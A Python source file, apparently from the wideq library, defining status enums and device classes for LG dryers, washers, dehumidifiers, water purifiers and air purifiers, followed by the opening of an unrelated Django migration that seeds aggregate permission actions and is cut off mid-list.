ANTI_CREASE = "@WM_STATE_ANTI_CREASE_W"
END = "@WM_STATE_END_W"
class DRYLEVEL(enum.Enum):
DAMP = "@WM_DRY27_DRY_LEVEL_DAMP_W"
LESS = "@WM_DRY27_DRY_LEVEL_LESS_W"
NORMAL = "@WM_DRY27_DRY_LEVEL_NORMAL_W"
MORE = "@WM_DRY27_DRY_LEVEL_MORE_W"
VERY = "@WM_DRY27_DRY_LEVEL_VERY_W"
class TEMPCONTROL(enum.Enum):
ULTRA_LOW = "@WM_DRY27_TEMP_ULTRA_LOW_W"
LOW = "@WM_DRY27_TEMP_LOW_W"
MEDIUM = "@WM_DRY27_TEMP_MEDIUM_W"
MID_HIGH = "@WM_DRY27_TEMP_MID_HIGH_W"
HIGH = "@WM_DRY27_TEMP_HIGH_W"
class ECOHYBRID(enum.Enum):
ECO = "@WM_DRY24_ECO_HYBRID_ECO_W"
NORMAL = "@WM_DRY24_ECO_HYBRID_NORMAL_W"
TURBO = "@WM_DRY24_ECO_HYBRID_TURBO_W"
class DRYERERROR(enum.Enum):
ERROR_DOOR = "@WM_US_DRYER_ERROR_DE_W"
ERROR_DRAINMOTOR = "@WM_US_DRYER_ERROR_OE_W"
ERROR_LE1 = "@WM_US_DRYER_ERROR_LE1_W"
ERROR_TE1 = "@WM_US_DRYER_ERROR_TE1_W"
ERROR_TE2 = "@WM_US_DRYER_ERROR_TE2_W"
ERROR_F1 = "@WM_US_DRYER_ERROR_F1_W"
ERROR_LE2 = "@WM_US_DRYER_ERROR_LE2_W"
ERROR_AE = "@WM_US_DRYER_ERROR_AE_W"
ERROR_dE4 = "@WM_WW_FL_ERROR_DE4_W"
ERROR_NOFILTER = "@WM_US_DRYER_ERROR_NOFILTER_W"
ERROR_EMPTYWATER = "@WM_US_DRYER_ERROR_EMPTYWATER_W"
ERROR_CE1 = "@WM_US_DRYER_ERROR_CE1_W"
class DryerDevice(Device):
def monitor_start(self):
"""Start monitoring the device's status."""
self.mon = Monitor(self.client.session, self.device.id)
self.mon.start()
def monitor_stop(self):
"""Stop monitoring the device's status."""
self.mon.stop()
def delete_permission(self):
self._delete_permission()
def poll(self):
"""Poll the device's current state.
Monitoring must be started first with `monitor_start`. Return
either an `ACStatus` object or `None` if the status is not yet
available.
"""
data = self.mon.poll()
if data:
res = self.model.decode_monitor(data)
"""
with open('/config/wideq/dryer_polled_data.json','w', encoding="utf-8") as dumpfile:
json.dump(res, dumpfile, ensure_ascii=False, indent="\t")
"""
return DryerStatus(self, res)
else:
return None
class DryerStatus(object):
"""Higher-level information about an Ref device's current status.
"""
def __init__(self, dryer, data):
self.dryer = dryer
self.data = data
def lookup_enum(self, key):
return self.dryer.model.enum_name(key, self.data[key])
def lookup_reference(self, key):
return self.dryer.model.reference_name(key, self.data[key])
def lookup_bit(self, key, index):
bit_value = int(self.data[key])
bit_index = 2 ** index
mode = bin(bit_value & bit_index)
if mode == bin(0):
return 'OFF'
else:
return 'ON'
@property
def is_on(self):
run_state = DRYERSTATE(self.lookup_enum('State'))
return run_state != DRYERSTATE.OFF
@property
def run_state(self):
return DRYERSTATE(self.lookup_enum('State'))
@property
def pre_state(self):
return DRYERSTATE(self.lookup_enum('PreState'))
@property
def remaintime_hour(self):
return self.data['Remain_Time_H']
@property
def remaintime_min(self):
return self.data['Remain_Time_M']
@property
def initialtime_hour(self):
return self.data['Initial_Time_H']
@property
def initialtime_min(self):
return self.data['Initial_Time_M']
@property
def reservetime_hour(self):
return self.data['Reserve_Time_H']
@property
def reservetime_min(self):
return self.data['Reserve_Time_M']
@property
def reserveinitialtime_hour(self):
return self.data['Reserve_Initial_Time_H']
@property
def reserveinitialtime_min(self):
return self.data['Reserve_Initial_Time_M']
@property
def current_course(self):
course = self.lookup_reference('Course')
if course == '-':
return 'OFF'
else:
return course
@property
def error_state(self):
error = self.lookup_reference('Error')
if error == '-':
return 'OFF'
elif error == 'No Error':
return 'NO_ERROR'
else:
return DRYERERROR(error)
@property
def drylevel_state(self):
drylevel = self.lookup_enum('DryLevel')
if drylevel == '-':
return 'OFF'
return DRYLEVEL(drylevel)
@property
def tempcontrol_state(self):
tempcontrol = self.lookup_enum('TempControl')
if tempcontrol == '-':
return 'OFF'
return TEMPCONTROL(tempcontrol)
@property
def ecohybrid_state(self):
ecohybrid = self.lookup_enum('EcoHybrid')
if ecohybrid == '-':
return 'OFF'
return ECOHYBRID(ecohybrid)
@property
def process_state(self):
return DRYERPROCESSSTATE(self.lookup_enum('ProcessState'))
@property
def current_smartcourse(self):
smartcourse = self.lookup_reference('SmartCourse')
if smartcourse == '-':
return 'OFF'
else:
return smartcourse
@property
def anticrease_state(self):
return self.lookup_bit('Option1', 1)
@property
def childlock_state(self):
return self.lookup_bit('Option1', 4)
@property
def selfcleaning_state(self):
return self.lookup_bit('Option1', 5)
@property
def dampdrybeep_state(self):
return self.lookup_bit('Option1', 6)
@property
def handiron_state(self):
return self.lookup_bit('Option1', 7)
"""------------------for Washer"""
class WASHERSTATE(enum.Enum):
OFF = "@WM_STATE_POWER_OFF_W"
INITIAL = "@WM_STATE_INITIAL_W"
PAUSE = "@WM_STATE_PAUSE_W"
RESERVE = "@WM_STATE_RESERVE_W"
DETECTING = "@WM_STATE_DETECTING_W"
RUNNING = "@WM_STATE_RUNNING_W"
RINSING = "@WM_STATE_RINSING_W"
SPINNING = "@WM_STATE_SPINNING_W"
SOAK = "@WM_STATE_SOAK_W"
COMPLETE = "@WM_STATE_COMPLETE_W"
FIRMWARE = "@WM_STATE_FIRMWARE_W"
SMART_DIAGNOSIS = "@WM_STATE_SMART_DIAGNOSIS_W"
class WASHERSOILLEVEL(enum.Enum):
LIGHT = "@WM_OPTION_SOIL_LEVEL_LIGHT_W"
LIGHT_NORMAL = "@WM_OPTION_SOIL_LEVEL_LIGHT_NORMAL_W"
NORMAL = "@WM_OPTION_SOIL_LEVEL_NORMAL_W"
NORMAL_HEAVY = "@WM_OPTION_SOIL_LEVEL_NORMAL_HEAVY_W"
HEAVY = "@WM_OPTION_SOIL_LEVEL_HEAVY_W"
class WASHERWATERTEMP(enum.Enum):
TAP_COLD = "@WM_OPTION_TEMP_TAP_COLD_W"
COLD = "@WM_OPTION_TEMP_COLD_W"
SEMI_WARM = "@WM_OPTION_TEMP_SEMI_WARM_W"
WARM = "@WM_OPTION_TEMP_WARM_W"
HOT = "@WM_OPTION_TEMP_HOT_W"
EXTRA_HOT = "@WM_OPTION_TEMP_EXTRA_HOT_W"
class WASHERSPINSPEED(enum.Enum):
NO_SELECT = "@WM_OPTION_SPIN_NO_SPIN_W"
LOW = "@WM_OPTION_SPIN_LOW_W"
MEDIUM = "@WM_OPTION_SPIN_MEDIUM_W"
HIGH = "@WM_OPTION_SPIN_HIGH_W"
EXTRA_HIGH = "@WM_OPTION_SPIN_EXTRA_HIGH_W"
class WASHERRINSECOUNT(enum.Enum):
NO_SELECT = "@CP_OFF_EN_W"
ONE = "@WM_KR_TT27_WD_WIFI_OPTION_RINSECOUNT_1_W"
TWO = "@WM_KR_TT27_WD_WIFI_OPTION_RINSECOUNT_2_W"
THREE = "@WM_KR_TT27_WD_WIFI_OPTION_RINSECOUNT_3_W"
FOUR = "@WM_KR_TT27_WD_WIFI_OPTION_RINSECOUNT_4_W"
FIVE = "@WM_KR_TT27_WD_WIFI_OPTION_RINSECOUNT_5_W"
class WASHERDRYLEVEL(enum.Enum):
NO_SELECT = "@WM_TERM_NO_SELECT_W"
WIND = "@WM_KR_TT27_WD_WIFI_OPTION_DRYLEVEL_WIND_W"
TURBO = "@WM_KR_TT27_WD_WIFI_OPTION_DRYLEVEL_TURBO_W"
TIME_30 = "@WM_KR_TT27_WD_WIFI_OPTION_DRYLEVEL_TIME_30_W"
TIME_60 = "@WM_KR_TT27_WD_WIFI_OPTION_DRYLEVEL_TIME_60_W"
TIME_90 = "@WM_KR_TT27_WD_WIFI_OPTION_DRYLEVEL_TIME_90_W"
TIME_120 = "@WM_KR_TT27_WD_WIFI_OPTION_DRYLEVEL_TIME_120_W"
TIME_150 = "@WM_KR_TT27_WD_WIFI_OPTION_DRYLEVEL_TIME_150_W"
class WASHERERROR(enum.Enum):
ERROR_dE2 = "@WM_KR_TT27_WD_WIFI_ERROR_DE2"
ERROR_IE = "@WM_KR_TT27_WD_WIFI_ERROR_IE"
ERROR_OE = "@WM_KR_TT27_WD_WIFI_ERROR_OE"
ERROR_UE = "@WM_KR_TT27_WD_WIFI_ERROR_UE"
ERROR_FE = "@WM_KR_TT27_WD_WIFI_ERROR_FE"
ERROR_PE = "@WM_KR_TT27_WD_WIFI_ERROR_PE"
ERROR_tE = "@WM_KR_TT27_WD_WIFI_ERROR_TE"
ERROR_LE = "@WM_KR_TT27_WD_WIFI_ERROR_LE"
ERROR_CE = "@WM_KR_TT27_WD_WIFI_ERROR_CE"
ERROR_dHE = "@WM_KR_TT27_WD_WIFI_ERROR_DHE"
ERROR_PF = "@WM_KR_TT27_WD_WIFI_ERROR_PF"
ERROR_FF = "@WM_KR_TT27_WD_WIFI_ERROR_FF"
ERROR_dCE = "@WM_KR_TT27_WD_WIFI_ERROR_DCE"
ERROR_EE = "@WM_KR_TT27_WD_WIFI_ERROR_EE"
ERROR_PS = "@WM_KR_TT27_WD_WIFI_ERROR_PS"
ERROR_dE1 = "@WM_KR_TT27_WD_WIFI_ERROR_DE1"
ERROR_LOE = "@WM_KR_TT27_WD_WIFI_ERROR_LOE"
class WasherDevice(Device):
def monitor_start(self):
"""Start monitoring the device's status."""
self.mon = Monitor(self.client.session, self.device.id)
self.mon.start()
def monitor_stop(self):
"""Stop monitoring the device's status."""
self.mon.stop()
def delete_permission(self):
self._delete_permission()
def poll(self):
"""Poll the device's current state.
Monitoring must be started first with `monitor_start`. Return
either an `ACStatus` object or `None` if the status is not yet
available.
"""
data = self.mon.poll()
if data:
res = self.model.decode_monitor(data)
"""
with open('/config/wideq/washer_polled_data.json','w', encoding="utf-8") as dumpfile:
json.dump(res, dumpfile, ensure_ascii=False, indent="\t")
"""
return WasherStatus(self, res)
else:
return None
class WasherStatus(object):
def __init__(self, washer, data):
self.washer = washer
self.data = data
def lookup_enum(self, key):
return self.washer.model.enum_name(key, self.data[key])
def lookup_reference(self, key):
return self.washer.model.reference_name(key, self.data[key])
def lookup_bit(self, key, index):
bit_value = int(self.data[key])
bit_index = 2 ** index
mode = bin(bit_value & bit_index)
if mode == bin(0):
return 'OFF'
else:
return 'ON'
@property
def is_on(self):
run_state = WASHERSTATE(self.lookup_enum('State'))
return run_state != WASHERSTATE.OFF
@property
def run_state(self):
return WASHERSTATE(self.lookup_enum('State'))
@property
def pre_state(self):
return WASHERSTATE(self.lookup_enum('PreState'))
@property
def remaintime_hour(self):
return self.data['Remain_Time_H']
@property
def remaintime_min(self):
return self.data['Remain_Time_M']
@property
def initialtime_hour(self):
return self.data['Initial_Time_H']
@property
def initialtime_min(self):
return self.data['Initial_Time_M']
@property
def reservetime_hour(self):
return self.data['Reserve_Time_H']
@property
def reservetime_min(self):
return self.data['Reserve_Time_M']
@property
def current_course(self):
course = self.lookup_reference('Course')
if course == '-':
return 'OFF'
else:
return course
@property
def error_state(self):
error = self.lookup_reference('Error')
if error == '-':
return 'OFF'
elif error == 'No Error':
return 'NO_ERROR'
else:
return WASHERERROR(error)
@property
def wash_option_state(self):
soillevel = self.lookup_enum('SoilLevel')
if soillevel == '-':
return 'OFF'
return WASHERSOILLEVEL(soillevel)
@property
def spin_option_state(self):
spinspeed = self.lookup_enum('SpinSpeed')
if spinspeed == '-':
return 'OFF'
return WASHERSPINSPEED(spinspeed)
@property
def water_temp_option_state(self):
water_temp = self.lookup_enum('WTemp')
if water_temp == '-':
return 'OFF'
return WASHERWATERTEMP(water_temp)
@property
def rinsecount_option_state(self):
rinsecount = self.lookup_enum('RinseCount')
if rinsecount == '-':
return 'OFF'
return WASHERRINSECOUNT(rinsecount)
@property
def drylevel_option_state(self):
drylevel = self.lookup_enum('DryLevel')
if drylevel == '-':
return 'OFF'
return WASHERDRYLEVEL(drylevel)
@property
def current_smartcourse(self):
smartcourse = self.lookup_reference('SmartCourse')
if smartcourse == '-':
return 'OFF'
else:
return smartcourse
@property
def freshcare_state(self):
return self.lookup_bit('Option1', 1)
@property
def childlock_state(self):
return self.lookup_bit('Option1', 3)
@property
def steam_state(self):
return self.lookup_bit('Option1', 4)
@property
def turboshot_state(self):
return self.lookup_bit('Option2', 7)
@property
def tubclean_count(self):
return self.data['TCLCount']
@property
def load_level(self):
return self.lookup_enum('LoadLevel')
"""------------------for Dehumidifier"""
class DEHUMOperation(enum.Enum):
ON = "@operation_on"
OFF = "@operation_off"
class DEHUMOPMode(enum.Enum):
SMART_DEHUM = "@AP_MAIN_MID_OPMODE_SMART_DEHUM_W"
FAST_DEHUM = "@AP_MAIN_MID_OPMODE_FAST_DEHUM_W"
SILENT_DEHUM = "@AP_MAIN_MID_OPMODE_CILENT_DEHUM_W"
CONCENTRATION_DRY = "@AP_MAIN_MID_OPMODE_CONCENTRATION_DRY_W"
CLOTHING_DRY = "@AP_MAIN_MID_OPMODE_CLOTHING_DRY_W"
IONIZER = "@AP_MAIN_MID_OPMODE_IONIZER_W"
class DEHUMWindStrength(enum.Enum):
LOW = "@AP_MAIN_MID_WINDSTRENGTH_DHUM_LOW_W"
HIGH = "@AP_MAIN_MID_WINDSTRENGTH_DHUM_HIGH_W"
class DEHUMAIRREMOVAL(enum.Enum):
OFF = "@AP_OFF_W"
ON = "@AP_ON_W"
class DIAGCODE(enum.Enum):
FAN_ERROR = "@ERROR_FAN"
NORMAL = "@NORMAL"
EEPROM_ERROR = "@ERROR_EEPROM"
class DehumDevice(Device):
def set_on(self, is_on):
mode = DEHUMOperation.ON if is_on else DEHUMOperation.OFF
mode_value = self.model.enum_value('Operation', mode.value)
self._set_control('Operation', mode_value)
def set_mode(self, mode):
mode_value = self.model.enum_value('OpMode', mode.value)
self._set_control('OpMode', mode_value)
def set_humidity(self, hum):
"""Set the device's target temperature in Celsius degrees.
"""
self._set_control('HumidityCfg', hum)
def set_windstrength(self, mode):
windstrength_value = self.model.enum_value('WindStrength', mode.value)
self._set_control('WindStrength', windstrength_value)
def set_airremoval(self, is_on):
mode = DEHUMAIRREMOVAL.ON if is_on else DEHUMAIRREMOVAL.OFF
mode_value = self.model.enum_value('AirRemoval', mode.value)
self._set_control('AirRemoval', mode_value)
def monitor_start(self):
"""Start monitoring the device's status."""
self.mon = Monitor(self.client.session, self.device.id)
self.mon.start()
def monitor_stop(self):
"""Stop monitoring the device's status."""
self.mon.stop()
def delete_permission(self):
self._delete_permission()
def poll(self):
"""Poll the device's current state.
Monitoring must be started first with `monitor_start`. Return
either an `ACStatus` object or `None` if the status is not yet
available.
"""
data = self.mon.poll()
if data:
res = self.model.decode_monitor(data)
"""
with open('/config/wideq/dehumidifier_polled_data.json','w', encoding="utf-8") as dumpfile:
json.dump(res, dumpfile, ensure_ascii=False, indent="\t")
"""
return DEHUMStatus(self, res)
else:
return None
class DEHUMStatus(object):
"""Higher-level information about an AC device's current status.
"""
def __init__(self, dehum, data):
self.dehum = dehum
self.data = data
def lookup_enum(self, key):
return self.dehum.model.enum_name(key, self.data[key])
@property
def is_on(self):
op = DEHUMOperation(self.lookup_enum('Operation'))
return op == DEHUMOperation.ON
@property
def mode(self):
return DEHUMOPMode(self.lookup_enum('OpMode'))
@property
def windstrength_state(self):
return DEHUMWindStrength(self.lookup_enum('WindStrength'))
@property
def airremoval_state(self):
return DEHUMAIRREMOVAL(self.lookup_enum('AirRemoval'))
@property
def current_humidity(self):
return self.data['SensorHumidity']
@property
def target_humidity(self):
return self.data['HumidityCfg']
"""------------------for Water Purifier"""
class COCKCLEAN(enum.Enum):
WAITING = "@WP_WAITING_W"
COCKCLEANING = "@WP_COCK_CLEANING_W"
class WPDevice(Device):
def day_water_usage(self, watertype):
typeCode = 'DAY'
sDate = datetime.today().strftime("%Y%m%d")
res = self._get_water_usage(typeCode, sDate, sDate)
data = res['itemDetail']
for usage_data in data:
if usage_data['waterType'] == watertype:
return usage_data['waterAmount']
def week_water_usage(self, watertype):
typeCode = 'WEEK'
amount = 0
weekday = datetime.today().weekday()
startdate = datetime.today() + timedelta(days=-(weekday+1))
enddate = datetime.today() + timedelta(days=(6-(weekday+1)))
sDate = datetime.date(startdate).strftime("%Y%m%d")
eDate = datetime.date(enddate).strftime("%Y%m%d")
res = self._get_water_usage(typeCode, sDate, eDate)
for weekdata in res:
for usage_data in weekdata['itemDetail']:
if usage_data['waterType'] == watertype:
amount = amount + int(usage_data['waterAmount'])
return amount
def month_water_usage(self, watertype):
typeCode = 'MONTH'
startdate = datetime.today().replace(day=1)
sDate = datetime.date(startdate).strftime("%Y%m%d")
eDate = datetime.today().strftime("%Y%m%d")
res = self._get_water_usage(typeCode, sDate, eDate)
data = res['itemDetail']
for usage_data in data:
if usage_data['waterType'] == watertype:
return usage_data['waterAmount']
def year_water_usage(self, watertype):
typeCode = 'YEAR'
startdate = datetime.today().replace(month=1, day=1)
sDate = datetime.date(startdate).strftime("%Y%m%d")
eDate = datetime.today().strftime("%Y%m%d")
res = self._get_water_usage(typeCode, sDate, eDate)
data = res['itemDetail']
for usage_data in data:
if usage_data['waterType'] == watertype:
return usage_data['waterAmount']
def monitor_start(self):
"""Start monitoring the device's status."""
self.mon = Monitor(self.client.session, self.device.id)
self.mon.start()
def monitor_stop(self):
"""Stop monitoring the device's status."""
self.mon.stop()
def delete_permission(self):
self._delete_permission()
def poll(self):
"""Poll the device's current state.
Monitoring must be started first with `monitor_start`. Return
either an `ACStatus` object or `None` if the status is not yet
available.
"""
data = self.mon.poll()
if data:
res = self.model.decode_monitor(data)
"""
with open('/config/wideq/waterpurifier_polled_data.json','w', encoding="utf-8") as dumpfile:
json.dump(cockclean, dumpfile, ensure_ascii=False, indent="\t")
"""
return WPStatus(self, res)
else:
return None
class WPStatus(object):
def __init__(self, wp, data):
self.wp = wp
self.data = data
def lookup_enum(self, key):
return self.wp.model.enum_name(key, self.data[key])
@property
def cockclean_state(self):
return COCKCLEAN(self.lookup_enum('CockClean'))
"""------------------for Air Purifier"""
class APOperation(enum.Enum):
ON = "@operation_on"
OFF = "@operation_off"
class APOPMode(enum.Enum):
CLEANBOOSTER = "@AP_MAIN_MID_OPMODE_CIRCULATOR_CLEAN_W"
SINGLECLEAN = "@AP_MAIN_MID_OPMODE_BABY_CARE_W"
CLEAN = "@AP_MAIN_MID_OPMODE_CLEAN_W"
DUALCLEAN = "@AP_MAIN_MID_OPMODE_DUAL_CLEAN_W"
AUTO = "@AP_MAIN_MID_OPMODE_AUTO_W"
class APWindStrength(enum.Enum):
LOWST_LOW = "@AP_MAIN_MID_WINDSTRENGTH_LOWST_LOW_W"
LOWST = "@AP_MAIN_MID_WINDSTRENGTH_LOWST_W"
LOW = "@AP_MAIN_MID_WINDSTRENGTH_LOW_W"
LOW_MID = "@AP_MAIN_MID_WINDSTRENGTH_LOW_MID_W"
MID = "@AP_MAIN_MID_WINDSTRENGTH_MID_W"
MID_HIGH = "@AP_MAIN_MID_WINDSTRENGTH_MID_HIGH_W"
HIGH = "@AP_MAIN_MID_WINDSTRENGTH_HIGH_W"
POWER = "@AP_MAIN_MID_WINDSTRENGTH_POWER_W"
AUTO = "@AP_MAIN_MID_WINDSTRENGTH_AUTO_W"
LONGPOWER = "@AP_MAIN_MID_WINDSTRENGTH_LONGPOWWER_W"
SHOWER = "@AP_MAIN_MID_WINDSTRENGTH_SHOWER_W"
FOREST = "@AP_MAIN_MID_WINDSTRENGTH_FOREST_W"
TURBO = "@AP_MAIN_MID_WINDSTRENGTH_TURBO_W"
FASTWIND = "@AP_MAIN_MID_WINDSTRENGTH_FASTWIND_W"
class APCirculateStrength(enum.Enum):
NOT_SUPPORTED = "@NON"
LOWST_LOW = '@AP_MAIN_MID_CIRCULATORSTRENGTH_LOWST_LOW_W'
LOWST = "@AP_MAIN_MID_CIRCULATORSTRENGTH_LOWST_W"
LOW = "@AP_MAIN_MID_CIRCULATORSTRENGTH_LOW_W"
LOW_MID = "@AP_MAIN_MID_CIRCULATORSTRENGTH_LOW_MID_W"
MID = "@AP_MAIN_MID_CIRCULATORSTRENGTH_MID_W"
MID_HIGH = "@AP_MAIN_MID_CIRCULATORSTRENGTH_MID_HIGH_W"
HIGH = "@AP_MAIN_MID_CIRCULATORSTRENGTH_HIGH_W"
POWER = "@AP_MAIN_MID_CIRCULATORSTRENGTH_POWER_W"
AUTO = "@AP_MAIN_MID_CIRCULATORSTRENGTH_AUTO_W"
LINK = "@AP_MAIN_MID_CIRCULATORSTRENGTH_LINK_W"
class APETCMODE(enum.Enum):
NOT_SUPPORT = "@NONSUPPORT"
OFF = "@AP_OFF_W"
ON = "@AP_ON_W"
class APTOTALAIRPOLUTION(enum.Enum):
NOT_SUPPORT = '0'
GOOD = '1'
NORMAL = '2'
BAD = '3'
VERYBAD = '4'
class APSMELL(enum.Enum):
NOT_SUPPORT = '0'
WEEK = '1'
NORMAL = '2'
STRONG = '3'
VERYSTRONG = '4'
class APDevice(Device):
def set_on(self, is_on):
mode = APOperation.ON if is_on else APOperation.OFF
mode_value = self.model.enum_value('Operation', mode.value)
self._set_control('Operation', mode_value)
def set_mode(self, mode):
mode_value = self.model.enum_value('OpMode', mode.value)
self._set_control('OpMode', mode_value)
def set_windstrength(self, mode):
windstrength_value = self.model.enum_value('WindStrength', mode.value)
self._set_control('WindStrength', windstrength_value)
def set_circulatestrength(self, mode):
circulatestrength_value = self.model.enum_value('CirculateStrength', mode.value)
self._set_control('CirculateStrength', circulatestrength_value)
def set_circulatedir(self, is_on):
mode = APETCMODE.ON if is_on else APETCMODE.OFF
mode_value = self.model.enum_value('CirculateDir', mode.value)
self._set_control('CirculateDir', mode_value)
def set_airremoval(self, is_on):
mode = APETCMODE.ON if is_on else APETCMODE.OFF
mode_value = self.model.enum_value('AirRemoval', mode.value)
self._set_control('AirRemoval', mode_value)
def set_signallighting(self, is_on):
mode = APETCMODE.ON if is_on else APETCMODE.OFF
mode_value = self.model.enum_value('SignalLighting', mode.value)
self._set_control('SignalLighting', mode_value)
def set_airfast(self, is_on):
mode = APETCMODE.ON if is_on else APETCMODE.OFF
mode_value = self.model.enum_value('AirFast', mode.value)
self._set_control('AirFast', mode_value)
def get_filter_state(self):
"""Get information about the filter."""
return self._get_config('Filter')
def monitor_start(self):
"""Start monitoring the device's status."""
self.mon = Monitor(self.client.session, self.device.id)
self.mon.start()
def monitor_stop(self):
"""Stop monitoring the device's status."""
self.mon.stop()
def delete_permission(self):
self._delete_permission()
def poll(self):
"""Poll the device's current state.
Monitoring must be started first with `monitor_start`. Return
either an `ACStatus` object or `None` if the status is not yet
available.
"""
data = self.mon.poll()
if data:
res = self.model.decode_monitor(data)
"""
with open('/config/wideq/airpurifier_polled_data.json','w', encoding="utf-8") as dumpfile:
json.dump(res, dumpfile, ensure_ascii=False, indent="\t")
"""
return APStatus(self, res)
else:
return None
class APStatus(object):
def __init__(self, ap, data):
self.ap = ap
self.data = data
def lookup_enum(self, key):
return self.ap.model.enum_name(key, self.data[key])
@property
def is_on(self):
op = APOperation(self.lookup_enum('Operation'))
return op == APOperation.ON
@property
def mode(self):
return APOPMode(self.lookup_enum('OpMode'))
@property
def support_oplist(self):
dict_support_opmode = self.ap.model.option_item('SupportOpMode')
support_opmode = []
for option in dict_support_opmode.values():
support_opmode.append(APOPMode(option).name)
return support_opmode
@property
def windstrength_state(self):
return APWindStrength(self.lookup_enum('WindStrength'))
@property
def circulatestrength_state(self):
return APCirculateStrength(self.lookup_enum('CirculateStrength'))
@property
def circulatedir_state(self):
return APETCMODE(self.lookup_enum('CirculateDir'))
@property
def airremoval_state(self):
return APETCMODE(self.lookup_enum('AirRemoval'))
@property
def signallighting_state(self):
return APETCMODE(self.lookup_enum('SignalLighting'))
@property
def airfast_state(self):
return APETCMODE(self.lookup_enum('AirFast'))
@property
def sensorpm1(self):
return self.data['SensorPM1']
@property
def sensorpm2(self):
return self.data['SensorPM2']
@property
def sensorpm10(self):
return self.data['SensorPM10']
@property
def total_air_polution(self):
return APTOTALAIRPOLUTION(self.data['TotalAirPolution'])
@property
def air_polution(self):
return APSMELL(self.data['AirPolution'])
| callelonnberg/wideq | wideq.py | wideq.py | py | 89,830 | python | en | code | 0 | github-code | 13 |
14230557337 | import json
from django.db import migrations
from backend.util.json import json_dumps
def init_aggregate_action(apps, schema_editor):
AggregateAction = apps.get_model("action", "AggregateAction")
aas = []
for agg_action in _default_aggregate_actions:
aa = AggregateAction(
system_id=agg_action["system_id"],
_action_ids=json_dumps(agg_action["action_ids"]),
_aggregate_resource_type=json_dumps(agg_action["aggregate_resource_type"]),
)
aas.append(aa)
AggregateAction.objects.bulk_create(aas)
class Migration(migrations.Migration):
dependencies = [
("action", "0001_initial"),
]
operations = [
migrations.RunPython(init_aggregate_action),
]
_default_aggregate_actions = [
{
"system_id": "bk_bcs_app",
"action_ids": ["project_view", "project_edit"],
"aggregate_resource_type": {"system_id": "bk_bcs_app", "id": "project"},
},
{
"system_id": "bk_cmdb",
"action_ids": [
"find_business_resource",
"edit_biz_host",
"create_biz_topology",
"edit_biz_topology",
"delete_biz_topology",
"create_biz_service_instance",
"edit_biz_service_instance",
"delete_biz_service_instance",
"create_biz_service_template",
"edit_biz_service_template",
"delete_biz_service_template",
"create_biz_set_template",
"edit_biz_set_template",
"delete_biz_set_template",
"create_biz_service_category",
"edit_biz_service_category",
"delete_biz_service_category",
"create_biz_dynamic_query",
"edit_biz_dynamic_query",
"delete_biz_dynamic_query",
"edit_biz_custom_field",
"edit_biz_host_apply",
"edit_business",
"archive_business",
"find_business",
],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "biz"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["create_resource_pool_host", "edit_resource_pool_directory", "delete_resource_pool_directory",],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_resource_pool_directory"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_resource_pool_host", "delete_resource_pool_host",],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_host_rsc_pool_directory"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["create_sys_instance", "edit_sys_instance", "delete_sys_instance"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_instance_model"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_cloud_account", "delete_cloud_account", "find_cloud_account"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_cloud_account"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_cloud_resource_task", "delete_cloud_resource_task", "find_cloud_resource_task"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_cloud_resource_task"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_cloud_area", "delete_cloud_area"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_cloud_area"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_event_subscription", "delete_event_subscription", "find_event_subscription"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_event_pushing"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_model_group", "delete_model_group"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_model_group"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_sys_model", "delete_sys_model"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_model"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_association_type", "delete_association_type"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "sys_association_type"},
},
{
"system_id": "bk_cmdb",
"action_ids": ["edit_biz_sensitive", "find_biz_sensitive"],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "biz_sensitive"},
},
{
"system_id": "bk_itsm",
"action_ids": [
"project_view",
"project_edit",
"system_settings_manage",
"service_create",
"service_manage",
"sla_manage",
"workflow_create",
"workflow_manage",
"workflow_deploy",
"flow_version_restore",
"flow_version_manage",
"flow_element_manage",
"role_create",
"role_manage",
"ticket_view",
],
"aggregate_resource_type": {"system_id": "bk_itsm", "id": "project"},
},
{
"system_id": "bk_job",
"action_ids": [
"access_business",
"quick_execute_script",
"quick_transfer_file",
"execute_script",
"create_script",
"view_script",
"manage_script",
"create_job_template",
"view_job_template",
"edit_job_template",
"delete_job_template",
"debug_job_template",
"launch_job_plan",
"create_job_plan",
"view_job_plan",
"edit_job_plan",
"delete_job_plan",
"sync_job_plan",
"create_tag",
"manage_tag",
"create_cron",
"manage_cron",
"view_history",
"notification_setting",
"create_account",
"manage_account",
],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "biz"},
},
{
"system_id": "bk_log_search",
"action_ids": [
"view_business",
"search_log",
"create_indices",
"manage_indices",
"create_collection",
"view_collection",
"manage_collection",
"create_es_source",
"manage_es_source",
"view_dashboard",
"manage_dashboard",
"manage_extract_config",
],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "biz"},
},
{
"system_id": "bk_monitorv3",
"action_ids": [
"view_business",
"view_home",
"view_dashboard",
"manage_dashboard",
"view_host",
"view_synthetic",
"manage_synthetic",
"view_event",
"view_plugin",
"manage_plugin",
"view_collection",
"manage_collection",
"view_rule",
"manage_rule",
"view_notify_team",
"manage_notify_team",
"view_downtime",
"manage_downtime",
"view_custom_metric",
"manage_custom_metric",
"view_custom_event",
"manage_custom_event",
"export_config",
"import_config",
"view_service_category",
"manage_upgrade",
"view_function_switch",
"manage_function_switch",
"explore_metric",
"manage_host",
],
"aggregate_resource_type": {"system_id": "bk_cmdb", "id": "biz"},
},
{
"system_id": "bk_sops",
"action_ids": [
